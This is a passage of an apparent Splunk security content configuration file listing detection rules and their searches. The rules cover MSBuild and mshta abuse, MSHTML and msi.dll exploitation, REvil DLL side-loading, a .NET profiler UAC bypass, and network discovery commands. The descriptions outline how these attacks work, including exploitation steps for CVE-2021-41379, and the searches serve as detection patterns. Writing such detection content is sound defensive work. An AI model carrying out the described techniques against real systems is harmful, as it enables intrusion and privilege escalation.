10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1127.001", "T1127"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic detects a suspicious MSBuild child process spawned by Windows Script Host (cscript or wscript). This behavior is commonly seen and used by malware or adversaries to execute a malicious MSBuild process via a malicious script on the compromised host. During triage, review parallel processes and identify any file modifications. MSBuild may load a script from the same path without having command-line arguments. 
action.notable.param.rule_title = MSBuild Suspicious Spawned By Script Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process_name) as process_name values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name IN ("wscript.exe", "cscript.exe") AND `process_msbuild` by Processes.dest Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `msbuild_suspicious_spawned_by_script_process_filter` [ESCU - Mshta spawning Rundll32 OR Regsvr32 Process - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious mshta.exe process that spawns a rundll32 or regsvr32 child process. This technique has been seen in several malware families, such as Trickbot, to load an initial .dll stage loader that executes and downloads the actual Trickbot payload. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a suspicious mshta.exe process that spawns a rundll32 or regsvr32 child process. This technique has been seen in several malware families, such as Trickbot, to load an initial .dll stage loader that executes and downloads the actual Trickbot payload. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Limited. This anomalous behavior is not commonly seen on a clean host. action.escu.creation_date = 2021-07-19 action.escu.modification_date = 2021-07-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Mshta spawning Rundll32 OR Regsvr32 Process - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Trickbot", "IcedID", "Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An mshta parent process $parent_process_name$ spawned child process $process_name$ on host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Mshta spawning Rundll32 OR Regsvr32 Process - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "IcedID", "Living Off The Land"], "cis20": ["CIS 10"], 
"confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a suspicious mshta.exe process that spawns a rundll32 or regsvr32 child process. This technique has been seen in several malware families, such as Trickbot, to load an initial .dll stage loader that executes and downloads the actual Trickbot payload. action.notable.param.rule_title = Mshta spawning Rundll32 OR Regsvr32 Process action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name = "mshta.exe" `process_rundll32` OR `process_regsvr32` by Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `mshta_spawning_rundll32_or_regsvr32_process_filter` [ESCU - MSHTML Module Load in Office Product - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies the module load of mshtml.dll into an Office product. This behavior has been related to CVE-2021-40444, where the malicious document will load ActiveX, which activates the MSHTML component. The vulnerability resides in the MSHTML component. During triage, identify parallel processes and capture any file modifications for analysis. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following detection identifies the module load of mshtml.dll into an Office product. This behavior has been related to CVE-2021-40444, whereas the malicious document will load ActiveX, which activates the MSHTML component. The vulnerability resides in the MSHTML component. During triage, identify parallel processes and capture any file modifications for analysis. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process names and image loads from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Limited false positives will be present, however, tune as necessary. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - MSHTML Module Load in Office Product - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ loading mshtml.dll. 
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MSHTML Module Load in Office Product - Rule action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments", "Microsoft MSHTML Remote Code Execution CVE-2021-40444", "CVE-2023-36884 Office and Windows HTML RCE Vulnerability"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-40444"], "impact": 80, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1566", "T1566.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies the module load of mshtml.dll into an Office product. This behavior has been related to CVE-2021-40444, whereas the malicious document will load ActiveX, which activates the MSHTML component. The vulnerability resides in the MSHTML component. During triage, identify parallel processes and capture any file modifications for analysis. 
action.notable.param.rule_title = MSHTML Module Load in Office Product action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=7 parent_process_name IN ("winword.exe","excel.exe","powerpnt.exe","mspub.exe","visio.exe","wordpad.exe","wordview.exe","onenote.exe","onenotem.exe","onenoteviewer.exe","onenoteim.exe", "msaccess.exe","Graph.exe","winproj.exe") ImageLoaded IN ("*\\mshtml.dll", "*\\Microsoft.mshtml.dll","*\\IE.Interop.MSHTML.dll","*\\MshtmlDac.dll","*\\MshtmlDed.dll","*\\MshtmlDer.dll") | stats count min(_time) as firstTime max(_time) as lastTime by dest, process_name, ImageLoaded, OriginalFileName, ProcessGuid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `mshtml_module_load_in_office_product_filter` [ESCU - MSI Module Loaded by Non-System Binary - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic identifies `msi.dll` being loaded by a binary not located in `system32`, `syswow64`, `winsxs` or `windows` paths. This behavior is most recently related to InstallerFileTakeOver, or CVE-2021-41379, and DLL side-loading. CVE-2021-41379 requires a binary to be dropped and `msi.dll` to be loaded by it. Successful exploitation of this issue happens in four parts: \ 1. Generation of an MSI that will trigger bad behavior. \ 2. Preparing a directory for MSI installation. \ 3. Inducing an error state. \ 4. Racing to introduce a junction and a symlink to trick msiexec.exe into modifying the attacker-specified file. \ In addition, `msi.dll` has been abused in DLL side-loading attacks by being loaded by non-system binaries. 
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following hunting analytic identifies `msi.dll` being loaded by a binary not located in `system32`, `syswow64`, `winsxs` or `windows` paths. This behavior is most recently related to InstallerFileTakeOver, or CVE-2021-41379, and DLL side-loading. CVE-2021-41379 requires a binary to be dropped and `msi.dll` to be loaded by it. Successful exploitation of this issue happens in four parts: \ 1. Generation of an MSI that will trigger bad behavior. \ 2. Preparing a directory for MSI installation. \ 3. Inducing an error state. \ 4. Racing to introduce a junction and a symlink to trick msiexec.exe into modifying the attacker-specified file. \ In addition, `msi.dll` has been abused in DLL side-loading attacks by being loaded by non-system binaries. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and image load events from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = It is possible some administrative utilities will load msi.dll outside of normal system paths; filter as needed. 
action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - MSI Module Loaded by Non-System Binary - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - MSI Module Loaded by Non-System Binary - Rule action.correlationsearch.annotations = {"analytic_story": ["Data Destruction", "Hermetic Wiper", "Windows Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 70, "cve": ["CVE-2021-41379"], "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded="*\\msi.dll" NOT (Image IN ("*\\System32\\*","*\\syswow64\\*","*\\windows\\*", "*\\winsxs\\*")) | stats count min(_time) as firstTime max(_time) as lastTime by Image ImageLoaded process_name dest EventCode ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `msi_module_loaded_by_non_system_binary_filter` [ESCU - Msmpeng Application DLL Side Loading - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicious creation of msmpeng.exe or mpsvc.dll in a non-default Windows Defender folder. This technique was seen with REvil ransomware in the Kaseya supply chain attack. 
The approach is to drop an old version of msmpeng.exe that loads the actual payload, named mpsvc.dll, which in turn loads the REvil ransomware onto the compromised machine. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a suspicious creation of msmpeng.exe or mpsvc.dll in a non-default Windows Defender folder. This technique was seen with REvil ransomware in the Kaseya supply chain attack. The approach is to drop an old version of msmpeng.exe that loads the actual payload, named mpsvc.dll, which in turn loads the REvil ransomware onto the compromised machine. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on file-system activity that includes the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Filesystem` node. action.escu.known_false_positives = Quite minimal false positives expected. 
action.escu.creation_date = 2023-03-15 action.escu.modification_date = 2023-03-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Msmpeng Application DLL Side Loading - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "Revil Ransomware"] action.risk = 1 action.risk.param._risk_message = Suspicious creation of msmpeng.exe or mpsvc.dll in a non-default Windows Defender folder on host - $dest$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Msmpeng Application DLL Side Loading - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "Revil Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1574.002", "T1574"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a suspicious creation of msmpeng.exe or mpsvc.dll in a non-default Windows Defender folder. This technique was seen with REvil ransomware in the Kaseya supply chain attack. 
The approach is to drop an old version of msmpeng.exe that loads the actual payload, named mpsvc.dll, which in turn loads the REvil ransomware onto the compromised machine. action.notable.param.rule_title = Msmpeng Application DLL Side Loading action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Filesystem.file_path) as file_path count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where (Filesystem.file_name = "msmpeng.exe" OR Filesystem.file_name = "mpsvc.dll") AND NOT (Filesystem.file_path IN ("*\\Program Files\\windows defender\\*","*\\WinSxS\\*defender-service*","*\\WinSxS\\Temp\\*defender-service*")) by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.user Filesystem.dest | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `msmpeng_application_dll_side_loading_filter` [ESCU - Net Localgroup Discovery - Rule] action.escu = 0 action.escu.enabled = 1 description = The following hunting analytic will identify the use of localgroup discovery using `net localgroup`. During triage, review parallel processes and identify any further suspicious behavior. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following hunting analytic will identify the use of localgroup discovery using `net localgroup`. During triage, review parallel processes and identify any further suspicious behavior. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. 
These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present. Tune as needed. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Net Localgroup Discovery - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "IcedID", "Windows Discovery Techniques", "Windows Post-Exploitation", "Azorult", "Active Directory Discovery", "Rhysida Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Net Localgroup Discovery - Rule action.correlationsearch.annotations = {"analytic_story": ["Prestige Ransomware", "Volt Typhoon", "Graceful Wipe Out Attack", "IcedID", "Windows Discovery Techniques", "Windows Post-Exploitation", "Azorult", "Active Directory Discovery", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1069", "T1069.001"], "nist": ["DE.AE"]} schedule_window = 
auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=net.exe OR Processes.process_name=net1.exe (Processes.process="*localgroup*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.original_file_name Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `net_localgroup_discovery_filter` [ESCU - NET Profiler UAC bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a registry modification used to bypass the Windows UAC feature. The technique adds a payload DLL path to the .NET COR profiler path, which is loaded by mmc.exe as soon as it is executed. This detection relies on monitoring the registry keys and values in the detection area. A Windows update may also modify some DLLs related to mmc.exe and add a DLL path to this registry key; in this case filtering is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects a registry modification used to bypass the Windows UAC feature. The technique adds a payload DLL path to the .NET COR profiler path, which is loaded by mmc.exe as soon as it is executed. This detection relies on monitoring the registry keys and values in the detection area. A Windows update may also modify some DLLs related to mmc.exe and add a DLL path to this registry key; in this case filtering is needed. 
action.escu.how_to_implement = To successfully implement this search you need to be ingesting registry events that include the name of the process responsible for the changes from your endpoints into the `Endpoint` data model in the `Registry` node. Also make sure that this registry path is included in your monitoring configuration (e.g. the Sysmon config). action.escu.known_false_positives = Limited false positives. It may be triggered by a Windows update that modifies this registry key. action.escu.creation_date = 2022-02-18 action.escu.modification_date = 2022-02-18 action.escu.confidence = high action.escu.full_search_name = ESCU - NET Profiler UAC bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] action.risk = 1 action.risk.param._risk_message = Suspicious modification of registry $registry_path$ with possible payload path $registry_value_data$ and key $registry_key_name$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - NET Profiler UAC bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a registry modification used to bypass the Windows UAC 
feature. The technique adds a payload DLL path to the .NET COR profiler path, which is loaded by mmc.exe as soon as it is executed. This detection relies on monitoring the registry keys and values in the detection area. A Windows update may also modify some DLLs related to mmc.exe and add a DLL path to this registry key; in this case filtering is needed. action.notable.param.rule_title = NET Profiler UAC bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Registry where Registry.registry_path= "*\\Environment\\COR_PROFILER_PATH" Registry.registry_value_data = "*.dll" by Registry.registry_path Registry.registry_key_name Registry.registry_value_data Registry.dest | `drop_dm_object_name(Registry)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `net_profiler_uac_bypass_filter` [ESCU - Network Connection Discovery With Arp - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `arp.exe` utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use arp.exe for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `arp.exe` utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use arp.exe for situational awareness and Active Directory Discovery. 
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-10 action.escu.modification_date = 2021-09-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Connection Discovery With Arp - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Qakbot", "Windows Post-Exploitation", "Prestige Ransomware", "Volt Typhoon", "IcedID"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Connection Discovery With Arp - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Qakbot", "Windows Post-Exploitation", "Prestige Ransomware", "Volt Typhoon", "IcedID"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = 
auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="arp.exe") (Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_connection_discovery_with_arp_filter` [ESCU - Network Connection Discovery With Net - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `net.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use net.exe for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `net.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use net.exe for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. action.escu.creation_date = 2021-09-10 action.escu.modification_date = 2021-09-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Connection Discovery With Net - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Connection Discovery With Net - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Azorult", "Windows Post-Exploitation", "Prestige Ransomware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe" OR Processes.process_name="net1.exe") (Processes.process=*use*) by Processes.dest Processes.user 
Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_connection_discovery_with_net_filter` [ESCU - Network Connection Discovery With Netstat - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `netstat.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use netstat.exe for situational awareness and Active Directory Discovery. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `netstat.exe` with command-line arguments utilized to get a listing of network connections on a compromised system. Red Teams and adversaries alike may use netstat.exe for situational awareness and Active Directory Discovery. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators or power users may use this command for troubleshooting. 
action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Network Connection Discovery With Netstat - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Volt Typhoon", "Active Directory Discovery", "Prestige Ransomware", "Windows Post-Exploitation", "Qakbot", "CISA AA22-277A", "CISA AA23-347A", "PlugX"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Network Connection Discovery With Netstat - Rule action.correlationsearch.annotations = {"analytic_story": ["Volt Typhoon", "Active Directory Discovery", "Prestige Ransomware", "Windows Post-Exploitation", "Qakbot", "CISA AA22-277A", "CISA AA23-347A", "PlugX"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1049"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="netstat.exe") (Processes.process=*-a*) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `network_connection_discovery_with_netstat_filter` [ESCU - Network Discovery Using Route Windows App - Rule] 
